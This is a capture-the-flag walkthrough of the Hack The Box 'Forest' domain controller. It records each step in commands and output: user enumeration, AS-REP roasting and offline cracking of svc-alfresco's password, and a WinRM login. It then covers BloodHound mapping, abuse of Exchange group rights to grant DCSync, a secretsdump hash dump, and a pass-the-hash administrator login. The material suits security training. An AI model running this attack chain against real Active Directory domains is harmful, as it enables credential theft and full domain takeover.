As usual, first an nmap scan of all TCP ports with service detection:
root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.161
Starting Nmap 7.80 (https://nmap.org ) at 2020-01-06 11:47 CET
Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49913/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds
There are already several interesting things in this result. First of all, this is a domain-joined system in the htb.local domain. It exposes DNS (53), Kerberos (88), LDAP (389, with LDAPS on 636 and the Global Catalog on 3268/3269), SMB (445) and Active Directory Web Services (9389) to the network, which is the port set of a domain controller. And last but not least, the WinRM port (5985) is open, so any valid credentials would give us a remote PowerShell session. This could be an attack similar to the approach I took a long time ago for the 'Active' machine on Hackthebox, combined with the WinRM attack on Heist!
PORT 3268 (LDAP)
LDAP stands for Lightweight Directory Access Protocol. It is used for querying and locating data about organizations, individuals and other resources such as files and devices in a network, so there are tools that search it for users, groups and so on. Port 3268 is the Global Catalog, a read-only partial copy of every domain in the forest.
https://github.com/ropnop/go-windapsearch
This is the tool I found to work; there is no need to clone it, simply go to the releases and download the compiled binary. Forest allows an anonymous (null) LDAP bind, so no credentials are needed to list the users:
windapsearch-linux-amd64 -d 'htb.local' --dc 10.10.10.161 -m users
We can also use enum4linux to see if it lists some more information:
root@kalivm:~/Forest# enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9
==========================
| Target Information |
==========================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
---snip---
===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
---snip---
=============================
| Users on 10.10.10.161 |
=============================
---snip---
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
---snip---
====================================================
| Password Policy Information for 10.10.10.161 |
====================================================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
---snip---
==============================
| Groups on 10.10.10.161 |
==============================
---snip---
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
---snip---
enum4linux complete on Mon Oct 21 12:05:29 2019
Enum4linux offers many interesting things. First of all, I see that there are some users (sebastien, lucinda, andy, mark, santi) present and a clear service account (svc-alfresco).
Furthermore, no password complexity is enforced and the account lockout threshold is None, which means easy-to-guess passwords and no lockouts to worry about while guessing them. The HealthMailbox and SM_ accounts and the long list of Exchange groups show that a Microsoft Exchange installation is present, and the permissions Exchange grants itself on the domain are well known to be dangerous if they are not tightened. The group memberships also show svc-alfresco sitting in Service Accounts, which is nested in Privileged IT Accounts. And a last line confirms the suspicion: Forest is actually in the Domain Controllers group! So I started browsing the impacket tools and trying several until I got to GetNPUsers.py. It asks the KDC for an AS-REP on behalf of each given user; for accounts with Kerberos pre-authentication disabled (UF_DONT_REQUIRE_PREAUTH) the KDC answers without any proof of the password, and the encrypted part of that answer can be cracked offline.
┌─[✗]─[puck@parrot-lt]─[~/htb/legacy/forrest]
└──╼ $python3 GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e
After trying it for some users, I finally got an AS-REP for the user svc-alfresco, who has pre-authentication disabled. This is not a usable TGT: the second part of the hash is the enc-part of the reply, encrypted with RC4-HMAC (etype 23) under a key derived from the user's password, which is exactly what makes it crackable offline with John:
┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $john forrest.hash --fork=4 -w=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads per process (8 total across 4 processes)
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB)
4 1g 0:00:00:02 DONE (2022-09-06 12:12) 0.4504g/s 460108p/s 460108c/s 460108C/s s5210523..s3r10u55
1 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 488548p/s 488548c/s 488548C/s !)KAT9aim.ie168
Waiting for 3 children to terminate
2 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 485899p/s 485899c/s 485899C/s !)!\\.abygurl69
3 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 483932p/s 483932c/s 483932C/s !)&!@!^^^%.a6_123
Session completed
So svc-alfresco's password is s3rvice. With these credentials and WinRM open, all you have to do is log in with evil-winrm, collect the user flag and start escalating privileges:
┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
Privilege Escalation
Use BloodHound and SharpHound.exe of the same version! The collector's first log line states which BloodHound release it matches (4.3.1 below); a zip from a mismatched collector will not import.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> upload SharpHound.exe
Info: Uploading /home/puck/htb/forest/SharpHound.exe to C:\Users\svc-alfresco\Documents\puck\SharpHound.exe
Data: 1395368 bytes of 1395368 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> ./SharpHound.exe
2024-03-23T06:29:47.6623457-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-03-23T06:29:47.7871629-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T06:29:47.8183965-07:00|INFORMATION|Initializing SharpHound at 6:29 AM on 3/23/2024
2024-03-23T06:29:48.0371459-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2024-03-23T06:29:48.1621474-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T06:29:48.6465284-07:00|INFORMATION|Beginning LDAP search for htb.local
2024-03-23T06:29:48.7871527-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-03-23T06:29:48.7871527-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-03-23T06:30:19.3799074-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 41 MB RAM
2024-03-23T06:30:34.9184755-07:00|INFORMATION|Consumers finished, closing output channel
2024-03-23T06:30:34.9809738-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-03-23T06:30:35.1372236-07:00|INFORMATION|Status: 161 objects finished (+161 3.5)/s -- Using 48 MB RAM
2024-03-23T06:30:35.1372236-07:00|INFORMATION|Enumeration finished in 00:00:46.4988600
2024-03-23T06:30:35.2153513-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
 117 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-03-23T06:30:35.2309746-07:00|INFORMATION|SharpHound Enumeration Completed at 6:30 AM on 3/23/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> ls

    Directory: C:\Users\svc-alfresco\Documents\puck

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/23/2024   6:30 AM          18835 20240323063034_BloodHound.zip
-a----        3/23/2024   6:30 AM          19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----        3/23/2024   6:29 AM        1046528 SharpHound.exe

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> download 20240323063034_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Documents\puck\20240323063034_BloodHound.zip to 20240323063034_BloodHound.zip
Info: Download successful!
Then load the zip file into BloodHound by simply dragging it onto the GUI, mark svc-alfresco as owned and look at the paths from it to Domain Admins.
Putting all the pieces together, the following is our attack path.
- Create a user on the domain. This is possible because svc-alfresco is a member of Account Operators (through Service Accounts, which is nested in Privileged IT Accounts).
- Add the user to the Exchange Windows Permissions group. This is possible because Account Operators, and so svc-alfresco, has GenericAll on that group.
- Give the user DCSync privileges. This is possible because Exchange Windows Permissions has WriteDacl on the htb.local domain object, so a member can grant any principal the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights that DCSync needs.
- Perform a DCSync attack: ask the domain controller to replicate its secrets over DRSUAPI, which dumps the password hashes of all the users on the domain.
- Pass the Administrator NT hash to WinRM (pass the hash) to get access to the administrator's account.
Alright, let’s get started.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net user puck Password /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net users /domain

User accounts for \\

-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA     Administrator            andy
DefaultAccount           Guest                    HealthMailbox0659cc1
HealthMailbox670628e     HealthMailbox6ded678     HealthMailbox7108a4e
HealthMailbox83d6781     HealthMailbox968e74d     HealthMailboxb01ac64
HealthMailboxc0a90c9     HealthMailboxc3d7722     HealthMailboxfc9daad
HealthMailboxfd87238     krbtgt                   lucinda
mark                     puck                     santi
sebastien                SM_1b41c9286325456bb     SM_1ffab36a2f5f479cb
SM_2c8eef0a09b545acb     SM_681f53d4942840e18     SM_75a538d3025e4db9a
SM_7c96b981967141ebb     SM_9b69f1b9d2cc45549     SM_c75ee099d0a64c91b
SM_ca8c2ed5bdab4dc9b     svc-alfresco
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net group

Group Accounts for \\

-------------------------------------------------------------------------------
*$D31000-NSEL5BRJ63V7    *Cloneable Domain Controllers   *Compliance Management
*Delegated Setup         *Discovery Management           *DnsUpdateProxy
*Domain Admins           *Domain Computers               *Domain Controllers
*Domain Guests           *Domain Users                   *Enterprise Admins
*Enterprise Key Admins   *Enterprise Read-only Domain Controllers   *Exchange Servers
*Exchange Trusted Subsystem   *Exchange Windows Permissions   *ExchangeLegacyInterop
*Group Policy Creator Owners   *Help Desk                *Hygiene Management
*Key Admins              *Managed Availability Servers   *Organization Management
*Privileged IT Accounts  *Protected Users                *Public Folder Management
*Read-only Domain Controllers   *Recipient Management    *Records Management
*Schema Admins           *Security Administrator         *Security Reader
*Server Management       *Service Accounts               *test
*UM Management           *View-Only Organization Management
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\puck> net group "Exchange Windows Permissions" /add puck
The command completed successfully.

The session still runs as svc-alfresco, who has no WriteDacl on the domain, so the PowerView call below (PowerView.ps1 has to be loaded in the session first) authenticates explicitly as puck, whose fresh Exchange Windows Permissions membership carries that right, and grants puck the replication rights DCSync needs on the domain object:
$pass = convertto-securestring 'Password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\puck', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity puck -Rights DCSync
┌──(puck㉿kali)-[~/htb/forest]
└─$ python3 secretsdump.py puck:Password@10.10.10.161
Impacket v0.9.25.dev1+20230823.145202.4518279 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
--snip--
puck:aes128-cts-hmac-sha1-96:1680bd7c6cd0d4b36a1db8a8541ec3f2
puck:des-cbc-md5:795d76612ac45dc7
FOREST$:aes256-cts-hmac-sha1-96:d5abc3475c9e0fe2ecced314be09464557acd9ab42e9023762f47bd26f3a1736
FOREST$:aes128-cts-hmac-sha1-96:de15b8b10df9fd952615a2f7157a9278
FOREST$:des-cbc-md5:0bef54cb2cb686b3
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...
The RemoteOperations error is expected: puck is not a local administrator on the DC, so the SAM/LSA route over the remote registry is denied, but the DRSUAPI replication route (DCSync) succeeds with the rights we just granted. Finally, a pass-the-hash login with the Administrator NT hash (-H instead of -p) gives an administrative shell:
┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Author: Puckiestyle